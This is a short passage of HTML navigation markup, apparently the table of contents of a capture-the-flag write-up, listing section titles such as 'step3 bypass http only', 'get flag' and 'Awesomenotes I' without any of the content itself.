base91_alphabet</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#step3-bypass-http-only"><span class="toc-number">1.3.</span> <span class="toc-text">step3 bypass http only</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#get-flag"><span class="toc-number">1.4.</span> <span class="toc-text">get flag</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Awesomenotes-I"><span class="toc-number">2.</span> <span class="toc-text">Awesomenotes I</span></a></li></ol></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>